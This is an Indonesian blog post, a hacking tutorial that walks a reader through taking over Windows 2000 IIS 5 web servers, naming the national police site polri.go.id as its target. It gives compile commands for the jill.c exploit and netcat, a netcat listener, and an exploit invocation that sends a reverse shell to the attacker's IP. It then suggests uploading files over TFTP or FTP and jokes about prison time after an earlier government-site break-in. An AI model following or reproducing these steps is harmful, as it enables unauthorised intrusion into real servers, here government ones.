mp3 Player

Efek klik kanan

Senin, 25 April 2016

Hacking WebServer W2K Pake *nix ( polri.go.id )

Hacking WebServer W2K Pake *nix ( polri.go.id ) 


Dalam kesempatan kali ini saya ingin menulis sedikit tentang hacking WebServer Windows 2000 dengan unix. Awalnya dari www.polri.go.id ditemukan lobangnya dengan unicode, tetapi unicode saja tidak mampu untuk menulis didalam file index.html karena selain tershadow, read only, rupanya terencrypt pula dengan HTML-Encrypt. Maka itu saya ingin memperkenalkan hacking Win2000 dengan unix, mungkin baru tapi kita coba saja.

Beberapa hal yang harus diperhatikan sebelum hacking Windows 2000 :

- Webservernya pake OS Windows 2000 dan terpasang web printing (terpasang secara default)
- Tidak ada firewall/Firewall yang membolehkan outbond connection ke suatu port (Besar sekali peluang suatu webserver tidak memiliki firewall atau mensetup firewall dengan benar, dengan melihat persentase jumlah webserver yang ada dan kondisi firewall yang dimiliki.
- Cracker memiliki exploit (jill.c) dan program yang dapat menjalankan secara listening mode (netcat).

Terus nich exploit bisa di pake di shell *nix terserah yang penting berbasis *nic, ya iyalah.. kan.. lagi ngebahas hacking lewat unix masa pake tools iis, heuhehuehue :P Coba searching di http://www.yahoo.com | http://www.google.com | atau | http://published.localbox.net untuk  exploit win2k unix remote! Coba download, saya mengunakan exploit yang sangat sederhana yakni jill.c dan NC100.TGZ, ok langsung konek ke shell! Belum punya? Bagi Donk!! Enaknya.. Ini Shell bayar di shellindo.com belilah.. kalau kamu ingin maju jangan carding mulu.

compile jill.c
$gcc jill.c -o jill

extract file NC110.TGZ
$tar -xzvf NC110.TGZ

lalu compile NC tersebut
$make generic

(sebenarnya tergantung OS anda, tetapi biasanya command ini berhasil, jadi saya menganjurkan menggunakan perintah ini saja bagi para newbie, jika command tadi berhasil, maka akan muncul suatu file yang bernama nc, dan anda bisa menjalankannya) Untuk menjalankan nc anda sebaiknya menggunakan root, karena akses port yang di denied oleh *nix anda.

#nc -l -p <port> -vv

misalkan saja port yang anda sebutkan adalah 99, jadi perintahnya adalah nc -l -p 99 -vv

setelah ini anda berganti window,dengan menekan <Alt+F2> atau menekan <Alt+F3> atau yang lain.

Setelah berganti window, anda login, dan jalankan jill

$./jill target port attacker port

Misalkan situs polisi-cyber.com menggunakan Windows 2000 dan menggunakan IIS 5 dan bisa dihack, dan ip komputer kita adalah 202.152.14.5 maka yang akan kita ketikkan adalah :

$./jill polisi-cyber.com 80 202.152.14.5 99

jika sudah, kita perlu berganti window yang sebelumnya dimana nc sedang dijalankan. tunggu beberapa saat, dan akan muncul prompt command ala windows, maka anda telah memiliki server abcd.com dan anda bebas melakukan apa saja.. (jika setelah ditunggu beberapa saat tidak muncul command shell, anda dapat menekan <enter>)

Hmmm, setelah kita kerjai server tadi, lalu bagaimana? anda bisa melanjutkan dengan menggunakan cara upload seperti unicode, bisa dengan menggunakan TFTP atau dengan FTP.

Lalu bagaimana jika saya tidak memiliki root, saya memiliki account di addr.com Anda masih bisa mengerjai situs tadi, anda jalankan dulu nc versi windows.

C:\nc -l -p 99 -vv
listening on [any] 99 ...

dan anda menggunakan shell anda dan jalankan jill di komputer shell tadi (contohnya addr.com)

File Lainnya : NC110  NC11NT

Ok Sekain dari saya untuk www.polri.go.id ? Pikir sendiri donk.. bocorannya kayak gitu.. masa maunya disusuin terus.. heuhehuehue ok dech.. sampai ketemu di tutorial berikutnya tentang hacking www.mpr.go.id, sampai gua masuk ke sell 3 hari 2 malam.. huehuehuehue :) Tapi nggak apa2, akhirnya gua bebas juga.. huehehuehuehuehue ok deh.. tapi jangan lupa berdoa dolo sebelum masuk penjara :v





1 komentar: